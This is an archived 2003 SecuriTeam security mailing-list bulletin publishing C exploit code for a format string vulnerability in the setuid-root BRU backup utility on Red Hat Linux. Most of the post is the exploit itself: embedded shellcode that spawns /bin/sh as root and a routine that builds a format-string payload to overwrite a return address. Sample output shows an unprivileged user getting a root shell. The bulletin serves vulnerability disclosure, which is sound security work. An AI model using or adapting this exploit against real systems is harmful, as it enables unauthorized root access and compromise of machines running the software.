[EXPL] BRU Format String Vulnerability Exploit
From: SecuriTeam (support_at_securiteam.com)
Date: 07/22/03
- Previous message: SecuriTeam: "[UNIX] Default CGI.pm Settings Vulnerable to Cross-site Scripting"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 22 Jul 2003 11:59:18 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
Beyond Security in Canada
Toronto-based Sunrays Technologies is now Beyond Security's representative in Canada.
We welcome ISPs, system integrators and IT systems resellers
to promote the most advanced vulnerability assessment solutions today.
Contact us at 416-482-0038 or at canadasales@beyondsecurity.com
- - - - - - - - -
BRU Format String Vulnerability Exploit
------------------------------------------------------------------------
SUMMARY
As we reported in our previous article:
<http://www.securiteam.com/unixfocus/5XP0H20AKU.html> BRU Buffer Overflow
and Format String Vulnerabilities, the BRU product has been found to
contain a buffer overflow and format string vulnerabilities.
The following exploit code can be used to test your system for the
mentioned format string vulnerability.
DETAILS
Exploit:
/*
* bru--format--root-expolit::^^)
*
* coded by nic
*
* (c) 0x333 Outsiders Security Labs / www.0x333.org
* test in redhat 8.0
* bash-2.05b$ ls -al bru
* -rws--x--x 1 root bin 165836 11�29 1999 bru
* bash-2.05b$ id
* uid=37(rpm) gid=37(rpm) groups=37(rpm)
* bash-2.05b$ ./bruex
* Use shellcode 0xc4ffff65
* sh-2.05b#
* ths : sam @ SST Group
*/
#include <stdio.h>
#include <strings.h>
#include <string.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>
#include <errno.h>
#define MAX_FMT_LENGTH 128
#define ADD 0x100
#define FOUR sizeof( size_t ) * 4
#define HELL "./bru"
#define OCT( b0, b1, b2, b3, addr, str ) { \
b0 = (addr >> 24) & 0xff; \
b1 = (addr >> 16) & 0xff; \
b2 = (addr >> 8) & 0xff; \
b3 = (addr ) & 0xff; \
if ( b0 * b1 * b2 * b3 == 0 ) { \
printf( "\n%s contains a NUL byte. Leaving...\n", str ); \
exit( EXIT_FAILURE ); \
} \
}
/ shell by sam/
char shellcode[]=
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
/* shellcode */
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31"
"\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d"
"\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff"
"\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58";
int
build_un( char * buf, unsigned int locaddr, unsigned int retaddr, unsigned
int
offset, unsigned int base )
{
unsigned char b0, b1, b2, b3;
int start = ( (base / ADD) + 1 ) * ADD;
int sz;
OCT( b0, b1, b2, b3, locaddr, "[ locaddr ]" );
sz = snprintf( buf, FOUR + 1, /* 16 char to have the 4 addresses */
"%c%c%c%c" /* + 1 for the ending \0 */
"%c%c%c%c"
"%c%c%c%c"
"%c%c%c%c",
b3, b2, b1, b0,
b3 + 1, b2, b1, b0,
b3 + 2, b2, b1, b0,
b3 + 3, b2, b1, b0 );
OCT( b0, b1, b2, b3, retaddr, "[ retaddr ]" );
return snprintf( buf + sz, MAX_FMT_LENGTH,
"%%%dx%%%d$n%%%dx%%%d$n%%%dx%%%d$n%%%dx%%%d$n",
b3 - FOUR + start - base, offset,
b2 - b3 + start, offset + 1,
b1 - b2 + start, offset + 2,
b0 - b1 + start, offset + 3 );
}
int main()
{
int ret_addr;
char buf[256];
char *args[24];
char *env[2];
ret_addr = 0xc4fffffa - strlen(shellcode) - strlen(HELL);
/* put in env */
env[0] = shellcode;
env[1] = NULL;
printf ("Use shellcode 0x%x\n", ret_addr);
memset(buf, 0, sizeof(buf));
build_un(buf, 0x08070148, 0x97d7d741, 73 ,3);
args[0] = HELL;
args[1] = buf;
args[2] = NULL;
execve (args[0], args, env);
perror ("execve");
return 0;
}
ADDITIONAL INFORMATION
The information has been provided by <mailto:nic0x333@hotmail.com> nic.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[UNIX] Default CGI.pm Settings Vulnerable to Cross-site Scripting"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
- [EXPL] Snort Back Orifice Preprocessor Buffer Overflow (Exploit)
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... * char buf1; ...
unsigned int ret_off; // offset from buf1 to saved eip ... (Securiteam) - [EXPL] WebFS Long File Overflow Exploit
... int op_plat_num; ... char *op_plat_sys; ... void filter_text;
... (Securiteam) - [EXPL] Samba "send_mailslot()" Buffer Overflow Vulnerability (Exploit)
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... void put_name(char *dest,
const char *name, int pad, unsigned int ... (Securiteam) - [UNIX] Remotely Exploitable Overflow In mod_mylo For Apache
... it is possible to construct a large HTTP request containing some shellcode ...
// an INT 0x80. ... char freebsd_shellcode= ... void my_send; ...
(Securiteam) - webfs 1.7.x:webserver remote file overflow exploit (use ftpd to mkdir)
... int op_plat_num; ... char *op_plat_sys; ... void filter_text;
... (Bugtraq)
